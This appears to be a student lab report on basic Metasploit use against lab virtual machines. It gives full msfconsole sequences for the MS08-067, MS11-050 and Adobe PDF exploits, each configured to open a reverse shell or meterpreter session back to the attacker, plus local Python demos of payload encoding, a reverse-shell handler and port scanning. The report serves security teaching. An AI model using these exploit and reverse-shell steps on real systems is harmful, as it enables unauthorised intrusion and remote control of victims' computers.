2017-2018-2 20155319 "Network Countermeasure Technology" Exp5: MSF Basic Application
Basic questions
- Explain in your own words what exploit, payload and encode are.
exploit: the code that takes advantage of a specific vulnerability to gain execution on the target; it is the vehicle that delivers the payload.
payload: the code the exploit delivers and runs once it succeeds, for example a backdoor, a command shell or meterpreter.
encode: transforming the payload with an encoder so that it contains none of the bytes the exploit cannot deliver and so that its appearance differs from the original; the lab uses it as camouflage, though on its own it is rarely enough against current anti-virus.
Practice process record
1. Windows Service Penetration Attack - MS08-067 Security Vulnerability
① Attack machine: kali ② Target machine: Windows XP SP3 (English)
The two machines can ping each other.
On the attack machine kali, run msfconsole to enter the console and enter the following commands in sequence:
- msf > search ms08-067 // use the search command to find the modules related to MS08-067
- msf > use exploit/windows/smb/ms08_067_netapi
- msf exploit(ms08_067_netapi) > show payloads // list the payloads compatible with this exploit
- msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp // reverse TCP connection: the target connects back to the attacker
- msf exploit(ms08_067_netapi) > set LHOST 192.168.72.131 // attacker ip, where the shell connects back
- msf exploit(ms08_067_netapi) > set LPORT 5319 // port the attacker listens on
- msf exploit(ms08_067_netapi) > set RHOST 192.168.72.135 // target ip
- msf exploit(ms08_067_netapi) > set target 0 // Automatic Targeting: the module fingerprints the target's OS version and language before choosing its return addresses
- msf exploit(ms08_067_netapi) > exploit
The attack succeeded; the result is as follows:
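The exploit above delivers its payload unchanged. When a module's BadChars list forbids bytes that occur in the chosen payload, Metasploit first passes the payload through an encoder, which is the "encode" step from the basic questions. The following Python is an added example written for this page, not code from the lab or from Metasploit: it reduces an encoder's job to a single-byte XOR, searches for a key under which no encoded byte is a bad character (the key itself must also be allowed, since the decoder stub embeds it), and decodes the result the way a stub would on the target. The payload bytes and bad-character list are constructed sample data, not real shellcode.

```python
# Added example, not part of the lab report: the bad-character avoidance that a
# Metasploit encoder performs, reduced to a single-byte XOR. "payload" below is
# constructed sample data standing in for shellcode, not a real payload.


def find_xor_key(payload: bytes, badchars: bytes) -> int:
    """Return a key k (1..255) such that no byte of payload XOR k is a bad
    character. k itself must also be allowed, because the decoder stub that
    is prepended to the encoded payload has to embed it. Raises ValueError
    when no single-byte key works (Metasploit would then try another encoder)."""
    for key in range(1, 256):
        if key in badchars:
            continue
        if all((b ^ key) not in badchars for b in payload):
            return key
    raise ValueError("no single-byte XOR key avoids the bad characters")


def encode(payload: bytes, badchars: bytes) -> tuple[int, bytes]:
    """Encode payload so it contains none of badchars; returns (key, encoded)."""
    key = find_xor_key(payload, badchars)
    encoded = bytes(b ^ key for b in payload)
    assert not any(b in badchars for b in encoded)  # sanity check
    return key, encoded


def decode(key: int, encoded: bytes) -> bytes:
    """What the decoder stub does on the target before jumping to the payload."""
    return bytes(b ^ key for b in encoded)


def demo() -> dict:
    # Constructed sample: a "payload" containing NUL, LF and CR, three bytes a
    # string-copy based exploit typically cannot deliver intact.
    payload = b"\x00\x0a\x0d\x41\x42\x43\x00\x90\xcc"
    badchars = b"\x00\x0a\x0d"
    key, encoded = encode(payload, badchars)
    return {
        "key": key,
        "encoded": encoded.hex(),
        "roundtrip": decode(key, encoded) == payload,
    }


if __name__ == "__main__":
    print(demo())
```

Real encoders (x86/shikata_ga_nai, for instance) vary the key per block and randomise the stub, but the constraint they satisfy is the same one `find_xor_key` enforces: every byte that reaches the target, stub included, must be outside the module's BadChars.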
2. Browser Penetration Attack - MS11-050
① Attack machine: kali ② Target machine: Windows XP Professional SP2 / Windows 7 Professional ③ IE version: 7.0 / 8.0
On the attack machine kali, run msfconsole to enter the console and enter the following commands in sequence:
- msf > use windows/browser/ms11_050_mshtml_cobjectelement
- msf exploit(ms11_050_mshtml_cobjectelement) > set payload windows/meterpreter/reverse_http // reverse HTTP connection
- msf exploit(ms11_050_mshtml_cobjectelement) > set LHOST 192.168.72.131 // attacker ip
- msf exploit(ms11_050_mshtml_cobjectelement) > set LPORT 5319 // port the reverse_http payload calls back to
- msf exploit(ms11_050_mshtml_cobjectelement) > set URIPATH rhl19 // the URI path the malicious page is served at
- msf exploit(ms11_050_mshtml_cobjectelement) > exploit
The module starts its web server and prints the local URL. Note that the URL uses port 8080, the module's default SRVPORT (the port the exploit page is served on), which is separate from LPORT 5319, the port the payload connects back to:
Visiting http://192.168.72.131:8080/rhl19 from the target machine brings up a warning pop-up:
I tried lowering IE's security level in its settings:
The second time I tried to access the above URL in IE, it still failed... very sad...
3. Client-side attacks Adobe
① Attack machine: kali ② Target machine: Windows XP Professional SP2 ③ Adobe version: 9.3
On the attack machine kali, run msfconsole to enter the console and enter the following commands in sequence:
- msf > use windows/fileformat/adobe_cooltype_sing
- msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp // reverse TCP connection
- msf exploit(adobe_cooltype_sing) > set LHOST 192.168.72.131 // attacker ip
- msf exploit(adobe_cooltype_sing) > set LPORT 5319 // attacker port
- msf exploit(adobe_cooltype_sing) > set FILENAME 20155319.pdf // name of the generated pdf file
- msf exploit(adobe_cooltype_sing) > exploit // generate the malicious pdf
The pdf was generated successfully.
The module stores the file under the hidden directory ~/.msf4/local/, so use the cp command to copy it to a more convenient directory.
After transferring the pdf file to the target machine, enter back on kali to leave the current module, then enter the handler (listening) module with the following commands. The payload, LHOST and LPORT must be identical to the values used when the pdf was generated, and the handler must be running before the pdf is opened:
- msf > use exploit/multi/handler // enter the listening module
- msf exploit(handler) > set payload windows/meterpreter/reverse_tcp // reverse TCP connection, the same payload as the pdf
- msf exploit(handler) > set LHOST 192.168.72.131 // attacker ip
- msf exploit(handler) > set LPORT 5319 // attacker port, fixed to the same value
- msf exploit(handler) > exploit
Then open the pdf file on the target machine; the target connects back and the session is established.
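The sequence above works only because the handler is already listening when the pdf is opened: a reverse_tcp payload makes the target initiate the connection to LHOST:LPORT, and a callback that finds nobody listening is simply lost. The Python below is an added illustration written for this page, not code from the lab or from Metasploit. A minimal handler listens on the attacker side, a stand-in for the target connects back and answers a first command, and the same callback is attempted once before the handler exists to show the failure mode. The addresses, the port (picked automatically) and the "whoami" reply are all constructed.

```python
# Added example, not part of the lab report: what exploit/multi/handler does
# for a reverse_tcp payload, and why it must already be listening on
# LHOST:LPORT when the pdf is opened. The target side is simulated in-process
# and only sends a constructed banner; no real payload is involved.

import socket
import threading


class Handler:
    """Listen on LHOST:LPORT (the attacker side) for the target's callback."""

    def __init__(self, lhost: str, lport: int):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((lhost, lport))
        self.sock.listen(1)

    def wait_for_session(self, timeout: float = 5.0) -> tuple[str, str]:
        """Accept one callback, send a first command, return (peer ip, reply)."""
        self.sock.settimeout(timeout)
        conn, peer = self.sock.accept()
        with conn:
            conn.sendall(b"whoami\n")
            reply = conn.recv(4096).decode(errors="replace").strip()
        self.sock.close()
        return peer[0], reply


def simulated_target(lhost: str, lport: int) -> bool:
    """Stand-in for the reverse_tcp payload: the target connects back to the
    attacker. Returns False when nothing is listening (the session is lost)."""
    try:
        with socket.create_connection((lhost, lport), timeout=2.0) as conn:
            if conn.recv(4096).strip() == b"whoami":
                conn.sendall(b"WINXP\\Administrator\n")  # constructed reply
        return True
    except OSError:
        return False


def free_port() -> int:
    """Pick an unused local port so the demo does not collide with anything."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo(lhost: str = "127.0.0.1") -> dict:
    lport = free_port()
    # 1. The pdf is opened before the handler is running: callback refused.
    before = simulated_target(lhost, lport)
    # 2. Handler listening first, then the target calls back: session opened.
    handler = Handler(lhost, lport)
    t = threading.Thread(target=simulated_target, args=(lhost, lport))
    t.start()
    peer, reply = handler.wait_for_session()
    t.join()
    return {"callback_without_handler": before, "peer": peer, "reply": reply}


if __name__ == "__main__":
    print(demo())
```

A real meterpreter session additionally stages a DLL over the same connection, but the ordering constraint is the one shown here, which is why the lab starts `exploit` in the handler before the pdf is opened on the target.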
4. Metasploit - Information Collection Module
1. Port scan
- msf > use auxiliary/scanner/portscan/syn // use the SYN port scan module
- msf auxiliary(syn) > show options
- msf auxiliary(syn) > set RHOSTS 192.168.72.137 // target
- msf auxiliary(syn) > set THREADS 50 // number of concurrent scanning threads
- msf auxiliary(syn) > exploit // run is equivalent for auxiliary modules
The scan was terminated early because it was taking too long; narrowing the port range with set PORTS (for example set PORTS 1-1024) makes it finish quickly.
2. Scan the TCP port usage of the target machine
Enter the following commands:
run starts the scan; the usage of all TCP ports on the WinXP target machine can be seen.
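The Python below is an added example for this page, not code from the lab or from Metasploit: a threaded TCP connect scan of the kind auxiliary/scanner/portscan/tcp performs, with a THREADS-style worker pool. The target is constructed in-process (two listening sockets on 127.0.0.1 and one port known to be closed), so it runs offline. A SYN scan such as portscan/syn sends raw SYN packets and never completes the handshake, which needs raw-socket privileges; a connect scan runs unprivileged but completes the handshake, so the service on the far side logs the connection.

```python
# Added example, not part of the lab report: the TCP connect scan that
# auxiliary/scanner/portscan/tcp performs, with a THREADS-style worker pool.
# The "target" is constructed locally so the example runs offline.

import socket
from concurrent.futures import ThreadPoolExecutor


def probe(host: str, port: int, timeout: float = 0.5) -> tuple[int, bool]:
    """One worker: True if a full TCP handshake succeeds on host:port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return port, True
    except OSError:  # refused, timed out or unreachable: treated as not open
        return port, False


def scan(host: str, ports, threads: int = 50, timeout: float = 0.5) -> list:
    """Connect-scan the given ports concurrently; returns sorted open ports."""
    with ThreadPoolExecutor(max_workers=threads) as pool:
        results = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return sorted(p for p, is_open in results if is_open)


def demo(host: str = "127.0.0.1") -> dict:
    """Constructed target: two listening sockets on this machine plus one port
    that is bound and released, so it is known to be closed when scanned."""
    listeners = [socket.socket() for _ in range(2)]
    for s in listeners:
        s.bind((host, 0))
        s.listen(1)
    open_ports = sorted(s.getsockname()[1] for s in listeners)
    with socket.socket() as tmp:
        tmp.bind((host, 0))
        closed_port = tmp.getsockname()[1]
    try:
        found = scan(host, open_ports + [closed_port], threads=3)
    finally:
        for s in listeners:
            s.close()
    return {"expected": open_ports, "found": found, "closed": closed_port}


if __name__ == "__main__":
    print(demo())
```

Against a remote host the cost of the scan is dominated by the per-port timeout on closed and filtered ports, which is why a wide range takes so long in the lab and why limiting the range or raising the thread count helps.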
Practice summary and experience
There is nothing particularly difficult in this experiment; the main difficulty was configuring the environment. I configured it myself for a long time without success and finally copied an already configured virtual machine. I experienced how specific the vulnerabilities Metasploit attacks are: they have detailed requirements on the operating system and software versions, and succeed only under certain circumstances and certain trigger conditions. I felt the gap between practice and a real attack.